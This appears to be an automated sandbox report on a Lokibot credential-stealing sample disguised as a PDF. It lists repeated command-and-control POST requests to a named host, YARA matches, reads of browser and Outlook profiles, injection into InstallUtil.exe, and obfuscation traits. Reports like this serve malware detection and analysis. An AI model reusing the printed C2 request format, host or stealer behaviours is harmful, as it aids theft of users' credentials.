Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 149Connection: close
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00404ED4 recv,
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: crimepreventionfl.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /scriptz/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: crimepreventionfl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 767D4FEAContent-Length: 176Connection: close
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 May 2020 06:49:27 GMTServer: ApacheConnection: closeContent-Type: text/htmlData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Urls found in memory or binary dataShow sources
Source: EDG95320200205005000471_126_953.pdf.exeString found in binary or memory: ftp://ftps://http://https://s.txt%s
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.co
Source: EDG95320200205005000471_126_953.pdf.exeString found in binary or memory: http://www.ibsensoftware.co1
Source: InstallUtil.exe, InstallUtil.exe, 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: EDG95320200205005000471_126_953.pdf.exe, type: SAMPLEMatched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000003.951528258.00000000057E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.955874046.000000000370B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.955990238.000000000374B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.955936456.0000000003731000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 0.0.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 0.2.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
.NET source code contains very large array initializationsShow sources
Source: EDG95320200205005000471_126_953.pdf.exe, pXu007d/u0037Ny.csLarge array initialization: 2Pc: array initializer size 61952
Source: 0.0.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, pXu007d/u0037Ny.csLarge array initialization: 2Pc: array initializer size 61952
Source: 0.2.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, pXu007d/u0037Ny.csLarge array initialization: 2Pc: array initializer size 61952
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: EDG95320200205005000471_126_953.pdf.exe
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_00D9A690 CreateProcessAsUserW,
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_00D9BA80
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_00D9CDD0
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_00D9C9E9
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_00D9BA71
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_00D97B60
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_00D97B29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_004029D4
Found potential string decryption / allocating functionsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 00405B6F appears 42 times
Sample file is different than original file name gathered from version infoShow sources
Source: EDG95320200205005000471_126_953.pdf.exeBinary or memory string: OriginalFilename vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.954662855.00000000026C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametfghfdgtr.dllT vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.957828128.0000000004CD0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametgrdcgd.dll2 vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000000.760578346.00000000003A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamelion4.exe8 vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefvsfesdf.dll2 vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClassLibrary2.dll, vs EDG95320200205005000471_126_953.pdf.exe
Source: EDG95320200205005000471_126_953.pdf.exeBinary or memory string: OriginalFilenamelion4.exe8 vs EDG95320200205005000471_126_953.pdf.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Yara signature matchShow sources
Source: EDG95320200205005000471_126_953.pdf.exe, type: SAMPLEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000003.951528258.00000000057E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.955874046.000000000370B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.955990238.000000000374B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.955936456.0000000003731000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.0.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.EDG95320200205005000471_126_953.pdf.exe.3a0000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.spyw.evad.winEXE@3/4@117/1
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
Contains functionality to instantiate COM classesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EDG95320200205005000471_126_953.pdf.exe.logJump to behavior
Creates mutexesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
PE file has an executable .text section and no other executable sectionShow sources
Source: EDG95320200205005000471_126_953.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts fileShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeFile read: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe:Zone.IdentifierJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe 'C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Uses Microsoft SilverlightShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
PE file contains a COM descriptor data directoryShow sources
Source: EDG95320200205005000471_126_953.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: EDG95320200205005000471_126_953.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Users\Switch\source\repos\OchiiMei\OchiiMei\obj\Release\tgrdcgd.pdb source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.957828128.0000000004CD0000.00000004.00000001.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: AA2F06.exe.3.dr
Source: Binary string: InstallUtil.pdb source: AA2F06.exe.3.dr
Source: Binary string: C:\Users\Switch\source\repos\OchiiMei\OchiiMei\obj\Release\tgrdcgd.pdbg6 source: EDG95320200205005000471_126_953.pdf.exe, 00000000.00000002.957828128.0000000004CD0000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Yara detected aPLib compressed binaryShow sources
Source: Yara matchFile source: 00000000.00000003.951582474.00000000057F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.951837487.00000000057AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.951528258.00000000057E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.955874046.000000000370B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.955990238.000000000374B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.955936456.0000000003731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: EDG95320200205005000471_126_953.pdf.exe PID: 2428, type: MEMORY
Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5516, type: MEMORY
Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_003D8412 pushfd ; iretd
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_003F34E8 push eax; ret
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_003DDD1B push ebx; iretd
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_003A356B push ss; iretd
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_003D69E0 push esi; ret
